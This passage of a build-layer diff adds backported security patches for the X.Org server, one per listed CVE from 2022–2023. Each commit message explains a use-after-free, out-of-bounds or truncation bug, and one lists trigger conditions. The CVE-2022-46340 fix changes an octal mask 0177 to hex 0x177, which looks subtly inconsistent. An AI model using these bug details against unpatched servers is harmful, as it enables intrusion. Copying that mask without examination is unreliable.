+Crashing on exception: -[__NSCFArray replaceObjectAtIndex:withObject:]: mutating method sent to immutable object
+
+Application Specific Backtrace 0:
+0 CoreFoundation 0x00007ff80d2c5e9b __exceptionPreprocess + 242
+1 libobjc.A.dylib 0x00007ff80d027e48 objc_exception_throw + 48
+2 CoreFoundation 0x00007ff80d38167b _CFThrowFormattedException + 194
+3 CoreFoundation 0x00007ff80d382a25 -[__NSCFArray removeObjectAtIndex:].cold.1 + 0
+4 CoreFoundation 0x00007ff80d2e6c0b -[__NSCFArray replaceObjectAtIndex:withObject:] + 119
+5 X11.bin 0x00000001003180f9 -[X11Controller tableView:setObjectValue:forTableColumn:row:] + 169
+
+Fixes: https://github.com/XQuartz/XQuartz/issues/267
+Signed-off-by: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=dfd057996b26420309c324ec844a5ba6dd07eda3]
+CVE: CVE-2022-3553
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ hw/xquartz/X11Controller.m | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/hw/xquartz/X11Controller.m b/hw/xquartz/X11Controller.m
+index 3efda50..9870ff2 100644
+--- a/hw/xquartz/X11Controller.m
++++ b/hw/xquartz/X11Controller.m
+@@ -467,8 +467,12 @@ extern char *bundle_id_prefix;
+ self.table_apps = table_apps;
+
+ NSArray * const apps = self.apps;
+- if (apps != nil)
+- [table_apps addObjectsFromArray:apps];
++
++ if (apps != nil) {
++ for (NSArray <NSString *> * row in apps) {
++ [table_apps addObject:row.mutableCopy];
++ }
++ }
+
+ columns = [apps_table tableColumns];
+ [[columns objectAtIndex:0] setIdentifier:@"0"];
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
new file mode 100644
index 0000000000..3f6b68fea8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
@@ -0,0 +1,39 @@
+From ccdd431cd8f1cabae9d744f0514b6533c438908c Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 5 Dec 2022 15:55:54 +1000
+Subject: [PATCH] xkb: reset the radio_groups pointer to NULL after freeing it
+
+Unlike other elements of the keymap, this pointer was freed but not
+reset. On a subsequent XkbGetKbdByName request, the server may access
+already freed memory.
+
+CVE-2022-4283, ZDI-CAN-19530
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ccdd431cd8f1cabae9d744f0514b6533c438908c]
+CVE: CVE-2022-4283
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ xkb/xkbUtils.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xkb/xkbUtils.c b/xkb/xkbUtils.c
+index 8975ade..9bc51fc 100644
+--- a/xkb/xkbUtils.c
++++ b/xkb/xkbUtils.c
+@@ -1327,6 +1327,7 @@ _XkbCopyNames(XkbDescPtr src, XkbDescPtr dst)
+ }
+ else {
+ free(dst->names->radio_groups);
++ dst->names->radio_groups = NULL;
+ }
+ dst->names->num_rg = src->names->num_rg;
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
new file mode 100644
index 0000000000..a6c97485cd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
@@ -0,0 +1,55 @@
+From b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 12:55:45 +1000
+Subject: [PATCH] Xtest: disallow GenericEvents in XTestSwapFakeInput
+
+XTestSwapFakeInput assumes all events in this request are
+sizeof(xEvent) and iterates through these in 32-byte increments.
+However, a GenericEvent may be of arbitrary length longer than 32 bytes,
+so any GenericEvent in this list would result in subsequent events to be
+misparsed.
+
+Additional, the swapped event is written into a stack-allocated struct
+xEvent (size 32 bytes). For any GenericEvent longer than 32 bytes,
+swapping the event may thus smash the stack like an avocado on toast.
+
+Catch this case early and return BadValue for any GenericEvent.
+Which is what would happen in unswapped setups anyway since XTest
+doesn't support GenericEvent.
+
+CVE-2022-46340, ZDI-CAN 19265
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63]
+CVE: CVE-2022-46340
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xtest.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Xext/xtest.c b/Xext/xtest.c
+index 38b8012..bf11789 100644
+--- a/Xext/xtest.c
++++ b/Xext/xtest.c
+@@ -501,10 +501,11 @@ XTestSwapFakeInput(ClientPtr client, xReq * req)
+
+ nev = ((req->length << 2) - sizeof(xReq)) / sizeof(xEvent);
+ for (ev = (xEvent *) &req[1]; --nev >= 0; ev++) {
++ int evtype = ev->u.u.type & 0x177;
+ /* Swap event */
+- proc = EventSwapVector[ev->u.u.type & 0177];
++ proc = EventSwapVector[evtype];
+ /* no swapping proc; invalid event type? */
+- if (!proc || proc == NotImplemented) {
++ if (!proc || proc == NotImplemented || evtype == GenericEvent) {
+ client->errorValue = ev->u.u.type;
+ return BadValue;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
new file mode 100644
index 0000000000..0ef6e5fc9f
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
@@ -0,0 +1,86 @@
+From 51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:55:32 +1000
+Subject: [PATCH] Xi: disallow passive grabs with a detail > 255
+
+The XKB protocol effectively prevents us from ever using keycodes above
+255. For buttons it's theoretically possible but realistically too niche
+to worry about. For all other passive grabs, the detail must be zero
+anyway.
+
+This fixes an OOB write:
+
+ProcXIPassiveUngrabDevice() calls DeletePassiveGrabFromList with a
+temporary grab struct which contains tempGrab->detail.exact = stuff->detail.
+For matching existing grabs, DeleteDetailFromMask is called with the
+stuff->detail value. This function creates a new mask with the one bit
+representing stuff->detail cleared.
+
+However, the array size for the new mask is 8 * sizeof(CARD32) bits,
+thus any detail above 255 results in an OOB array write.
+
+CVE-2022-46341, ZDI-CAN 19381
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b]
+CVE: CVE-2022-46341
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xipassivegrab.c | 22 ++++++++++++++--------
+ 1 file changed, 14 insertions(+), 8 deletions(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index d30f51f..89a5910 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -133,6 +133,12 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* XI2 allows 32-bit keycodes but thanks to XKB we can never
++ * implement this. Just return an error for all keycodes that
++ * cannot work anyway, same for buttons > 255. */
++ if (stuff->detail > 255)
++ return XIAlreadyGrabbed;
++
+ if (XICheckInvalidMaskBits(client, (unsigned char *) &stuff[1],
+ stuff->mask_len * 4) != Success)
+ return BadValue;
+@@ -203,14 +209,8 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ &param, XI2, &mask);
+ break;
+ case XIGrabtypeKeycode:
+- /* XI2 allows 32-bit keycodes but thanks to XKB we can never
+- * implement this. Just return an error for all keycodes that
+- * cannot work anyway */
+- if (stuff->detail > 255)
+- status = XIAlreadyGrabbed;
+- else
+- status = GrabKey(client, dev, mod_dev, stuff->detail,
+- &param, XI2, &mask);
++ status = GrabKey(client, dev, mod_dev, stuff->detail,
++ &param, XI2, &mask);
+ break;
+ case XIGrabtypeEnter:
+ case XIGrabtypeFocusIn:
+@@ -319,6 +319,12 @@ ProcXIPassiveUngrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* We don't allow passive grabs for details > 255 anyway */
++ if (stuff->detail > 255) {
++ client->errorValue = stuff->detail;
++ return BadValue;
++ }
++
+ rc = dixLookupWindow(&win, stuff->grab_window, client, DixSetAttrAccess);
+ if (rc != Success)
+ return rc;
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
new file mode 100644
index 0000000000..23fef3f321
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
@@ -0,0 +1,78 @@
+From b79f32b57cc0c1186b2899bce7cf89f7b325161b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Nov 2022 11:20:40 +1000
+Subject: [PATCH] Xext: free the XvRTVideoNotify when turning off from the same
+ client
+
+This fixes a use-after-free bug:
+
+When a client first calls XvdiSelectVideoNotify() on a drawable with a
+TRUE onoff argument, a struct XvVideoNotifyRec is allocated. This struct
+is added twice to the resources:
+ - as the drawable's XvRTVideoNotifyList. This happens only once per
+ drawable, subsequent calls append to this list.
+ - as the client's XvRTVideoNotify. This happens for every client.
+
+The struct keeps the ClientPtr around once it has been added for a
+client. The idea, presumably, is that if the client disconnects we can remove
+all structs from the drawable's list that match the client (by resetting
+the ClientPtr to NULL), but if the drawable is destroyed we can remove
+and free the whole list.
+
+However, if the same client then calls XvdiSelectVideoNotify() on the
+same drawable with a FALSE onoff argument, only the ClientPtr on the
+existing struct was set to NULL. The struct itself remained in the
+client's resources.
+
+If the drawable is now destroyed, the resource system invokes
+XvdiDestroyVideoNotifyList which frees the whole list for this drawable
+- including our struct. This function however does not free the resource
+for the client since our ClientPtr is NULL.
+
+Later, when the client is destroyed and the resource system invokes
+XvdiDestroyVideoNotify, we unconditionally set the ClientPtr to NULL. On
+a struct that has been freed previously. This is generally frowned upon.
+
+Fix this by calling FreeResource() on the second call instead of merely
+setting the ClientPtr to NULL. This removes the struct from the client
+resources (but not from the list), ensuring that it won't be accessed
+again when the client quits.
+
+Note that the assignment tpn->client = NULL; is superfluous since the
+XvdiDestroyVideoNotify function will do this anyway. But it's left for
+clarity and to match a similar invocation in XvdiSelectPortNotify.
+
+CVE-2022-46342, ZDI-CAN 19400
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b79f32b57cc0c1186b2899bce7cf89f7b325161b]
+CVE: CVE-2022-46342
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xvmain.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xext/xvmain.c b/Xext/xvmain.c
+index c520c7d..5f4c174 100644
+--- a/Xext/xvmain.c
++++ b/Xext/xvmain.c
+@@ -811,8 +811,10 @@ XvdiSelectVideoNotify(ClientPtr client, DrawablePtr pDraw, BOOL onoff)
+ tpn = pn;
+ while (tpn) {
+ if (tpn->client == client) {
+- if (!onoff)
++ if (!onoff) {
+ tpn->client = NULL;
++ FreeResource(tpn->id, XvRTVideoNotify);
++ }
+ return Success;
+ }
+ if (!tpn->client)
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
new file mode 100644
index 0000000000..838f7d3726
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
@@ -0,0 +1,51 @@
+From 842ca3ccef100ce010d1d8f5f6d6cc1915055900 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 14:53:07 +1000
+Subject: [PATCH] Xext: free the screen saver resource when replacing it
+
+This fixes a use-after-free bug:
+
+When a client first calls ScreenSaverSetAttributes(), a struct
+ScreenSaverAttrRec is allocated and added to the client's
+resources.
+
+When the same client calls ScreenSaverSetAttributes() again, a new
+struct ScreenSaverAttrRec is allocated, replacing the old struct. The
+old struct was freed but not removed from the clients resources.
+
+Later, when the client is destroyed the resource system invokes
+ScreenSaverFreeAttr and attempts to clean up the already freed struct.
+
+Fix this by letting the resource system free the old attrs instead.
+
+CVE-2022-46343, ZDI-CAN 19404
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/842ca3ccef100ce010d1d8f5f6d6cc1915055900]
+CVE: CVE-2022-46343
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/saver.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Xext/saver.c b/Xext/saver.c
+index c23907d..05b9ca3 100644
+--- a/Xext/saver.c
++++ b/Xext/saver.c
+@@ -1051,7 +1051,7 @@ ScreenSaverSetAttributes(ClientPtr client)
+ pVlist++;
+ }
+ if (pPriv->attr)
+- FreeScreenAttr(pPriv->attr);
++ FreeResource(pPriv->attr->resource, AttrType);
+ pPriv->attr = pAttr;
+ pAttr->resource = FakeClientID(client->index);
+ if (!AddResource(pAttr->resource, AttrType, (void *) pAttr))
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
new file mode 100644
index 0000000000..e25afa0d16
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
@@ -0,0 +1,75 @@
+From 8f454b793e1f13c99872c15f0eed1d7f3b823fe8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:26:57 +1000
+Subject: [PATCH] Xi: avoid integer truncation in length check of
+ ProcXIChangeProperty
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->num_items value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->num_items bytes, i.e. 4GB.
+
+The same bug exists in ProcChangeProperty and ProcXChangeDeviceProperty,
+so let's fix that too.
+
+CVE-2022-46344, ZDI-CAN 19405
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/8f454b793e1f13c99872c15f0eed1d7f3b823fe8]
+CVE: CVE-2022-46344
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ dix/property.c | 3 ++-
+ 2 files changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 6ec419e..0cfa6e3 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -890,7 +890,7 @@ ProcXChangeDeviceProperty(ClientPtr client)
+ REQUEST(xChangeDevicePropertyReq);
+ DeviceIntPtr dev;
+ unsigned long len;
+- int totalSize;
++ uint64_t totalSize;
+ int rc;
+
+ REQUEST_AT_LEAST_SIZE(xChangeDevicePropertyReq);
+@@ -1128,7 +1128,7 @@ ProcXIChangeProperty(ClientPtr client)
+ {
+ int rc;
+ DeviceIntPtr dev;
+- int totalSize;
++ uint64_t totalSize;
+ unsigned long len;
+
+ REQUEST(xXIChangePropertyReq);
+diff --git a/dix/property.c b/dix/property.c
+index ff1d669..6fdb74a 100644
+--- a/dix/property.c
++++ b/dix/property.c
+@@ -205,7 +205,8 @@ ProcChangeProperty(ClientPtr client)
+ WindowPtr pWin;
+ char format, mode;
+ unsigned long len;
+- int sizeInBytes, totalSize, err;
++ int sizeInBytes, err;
++ uint64_t totalSize;
+
+ REQUEST(xChangePropertyReq);
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
new file mode 100644
index 0000000000..ef2ee5d55e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
@@ -0,0 +1,38 @@
+From 0ba6d8c37071131a49790243cdac55392ecf71ec Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 25 Jan 2023 11:41:40 +1000
+Subject: [PATCH] Xi: fix potential use-after-free in DeepCopyPointerClasses
+
+CVE-2023-0494, ZDI-CAN-19596
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0ba6d8c37071131a49790243cdac55392ecf71ec]
+CVE: CVE-2023-0494
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 217baa9561..dcd4efb3bc 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -619,8 +619,10 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+ sizeof(XkbAction));
+ }
+- else
++ else {
+ free(to->button->xkb_acts);
++ to->button->xkb_acts = NULL;
++ }
+
+ memcpy(to->button->labels, from->button->labels,
+ from->button->numButtons * sizeof(Atom));
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
new file mode 100644
index 0000000000..51d0e0cab6
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
@@ -0,0 +1,46 @@
+From 26ef545b3502f61ca722a7a3373507e88ef64110 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Mon, 13 Mar 2023 11:08:47 +0100
+Subject: [PATCH] composite: Fix use-after-free of the COW
+
+ZDI-CAN-19866/CVE-2023-1393
+
+If a client explicitly destroys the compositor overlay window (aka COW),
+we would leave a dangling pointer to that window in the CompScreen
+structure, which will trigger a use-after-free later.
+
+Make sure to clear the CompScreen pointer to the COW when the latter gets
+destroyed explicitly by the client.
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3502f61ca722a7a3373507e88ef64110]
+CVE: CVE-2023-1393
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ composite/compwindow.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/composite/compwindow.c b/composite/compwindow.c
+index 4e2494b86b..b30da589e9 100644
+--- a/composite/compwindow.c
++++ b/composite/compwindow.c
+@@ -620,6 +620,11 @@ compDestroyWindow(WindowPtr pWin)
+ ret = (*pScreen->DestroyWindow) (pWin);
+ cs->DestroyWindow = pScreen->DestroyWindow;
+ pScreen->DestroyWindow = compDestroyWindow;
++
++ /* Did we just destroy the overlay window? */
++ if (pWin == cs->pOverlayWin)
++ cs->pOverlayWin = NULL;
++
+ /* compCheckTree (pWin->drawable.pScreen); can't check -- tree isn't good*/
+ return ret;
+ }
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
new file mode 100644
index 0000000000..508588481e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
@@ -0,0 +1,84 @@
+From 541ab2ecd41d4d8689e71855d93e492bc554719a Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 3 Oct 2023 11:53:05 +1000
+Subject: [PATCH] Xi/randr: fix handling of PropModeAppend/Prepend
+
+The handling of appending/prepending properties was incorrect, with at
+least two bugs: the property length was set to the length of the new
+part only, i.e. appending or prepending N elements to a property with P
+existing elements always resulted in the property having N elements
+instead of N + P.
+
+Second, when pre-pending a value to a property, the offset for the old
+values was incorrect, leaving the new property with potentially
+uninitalized values and/or resulting in OOB memory writes.
+For example, prepending a 3 element value to a 5 element property would
+result in this 8 value array:
+ [N, N, N, ?, ?, P, P, P ] P, P
+ ^OOB write
+
+The XI2 code is a copy/paste of the RandR code, so the bug exists in
+both.
+
+CVE-2023-5367, ZDI-CAN-22153
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/541ab2ecd41d4d8689e71855d93e492bc554719a]
+CVE: CVE-2023-5367
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ randr/rrproperty.c | 4 ++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 066ba21fba..d315f04d0e 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -730,7 +730,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ XIDestroyDeviceProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -747,7 +747,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index c2fb9585c6..25469f57b2 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -209,7 +209,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ RRDestroyOutputProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -226,7 +226,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
new file mode 100644
index 0000000000..720340d83b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
@@ -0,0 +1,102 @@
+From 564ccf2ce9616620456102727acb8b0256b7bbd7 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 5 Oct 2023 12:19:45 +1000
+Subject: [PATCH] mi: reset the PointerWindows reference on screen switch
+
+PointerWindows[] keeps a reference to the last window our sprite
+entered - changes are usually handled by CheckMotion().
+
+If we switch between screens via XWarpPointer our
+dev->spriteInfo->sprite->win is set to the new screen's root window.
+If there's another window at the cursor location CheckMotion() will
+trigger the right enter/leave events later. If there is not, it skips
+that process and we never trigger LeaveWindow() - PointerWindows[] for
+the device still refers to the previous window.
+
+If that window is destroyed we have a dangling reference that will
+eventually cause a use-after-free bug when checking the window hierarchy
+later.
+
+To trigger this, we require:
+- two protocol screens
+- XWarpPointer to the other screen's root window
+- XDestroyWindow before entering any other window
+
+This is a niche bug so we hack around it by making sure we reset the
+PointerWindows[] entry so we cannot have a dangling pointer. This
+doesn't handle Enter/Leave events correctly but the previous code didn't
+either.
+
+CVE-2023-5380, ZDI-CAN-21608
+
+This vulnerability was discovered by:
+Sri working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/564ccf2ce9616620456102727acb8b0256b7bbd7]
+CVE: CVE-2023-5380
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.h | 2 --
+ include/eventstr.h | 3 +++
+ mi/mipointer.c | 17 +++++++++++++++--
+ 3 files changed, 18 insertions(+), 4 deletions(-)
+
+diff --git a/dix/enterleave.h b/dix/enterleave.h
+index 4b833d8..e8af924 100644
+--- a/dix/enterleave.h
++++ b/dix/enterleave.h
+@@ -58,8 +58,6 @@ extern void DeviceFocusEvent(DeviceIntPtr dev,
+
+ extern void EnterWindow(DeviceIntPtr dev, WindowPtr win, int mode);
+
+-extern void LeaveWindow(DeviceIntPtr dev);
+-
+ extern void CoreFocusEvent(DeviceIntPtr kbd,
+ int type, int mode, int detail, WindowPtr pWin);
+
+diff --git a/include/eventstr.h b/include/eventstr.h
+index bf3b95f..2bae3b0 100644
+--- a/include/eventstr.h
++++ b/include/eventstr.h
+@@ -296,4 +296,7 @@ union _InternalEvent {
+ #endif
+ };
+
++extern void
++LeaveWindow(DeviceIntPtr dev);
++
+ #endif
+diff --git a/mi/mipointer.c b/mi/mipointer.c
+index 75be1ae..b12ae9b 100644
+--- a/mi/mipointer.c
++++ b/mi/mipointer.c
+@@ -397,8 +397,21 @@ miPointerWarpCursor(DeviceIntPtr pDev, ScreenPtr pScreen, int x, int y)
+ #ifdef PANORAMIX
+ && noPanoramiXExtension
+ #endif
+- )
+- UpdateSpriteForScreen(pDev, pScreen);
++ ) {
++ DeviceIntPtr master = GetMaster(pDev, MASTER_POINTER);
++ /* Hack for CVE-2023-5380: if we're moving
++ * screens PointerWindows[] keeps referring to the
++ * old window. If that gets destroyed we have a UAF
++ * bug later. Only happens when jumping from a window
++ * to the root window on the other screen.
++ * Enter/Leave events are incorrect for that case but
++ * too niche to fix.
++ */
++ LeaveWindow(pDev);
++ if (master)
++ LeaveWindow(master);
++ UpdateSpriteForScreen(pDev, pScreen);
++ }
+ }
+
+ /**
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
new file mode 100644
index 0000000000..0abd5914fa
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
@@ -0,0 +1,79 @@
+From 0c1a93d319558fe3ab2d94f51d174b4f93810afd Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 28 Nov 2023 15:19:04 +1000
+Subject: [PATCH] Xi: allocate enough XkbActions for our buttons
+
+button->xkb_acts is supposed to be an array sufficiently large for all
+our buttons, not just a single XkbActions struct. Allocating
+insufficient memory here means when we memcpy() later in
+XkbSetDeviceInfo we write into memory that wasn't ours to begin with,
+leading to the usual security ooopsiedaisies.
+
+CVE-2023-6377, ZDI-CAN-22412, ZDI-CAN-22413
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0c1a93d319558fe3ab2d94f51d174b4f93810afd]
+CVE: CVE-2023-6377
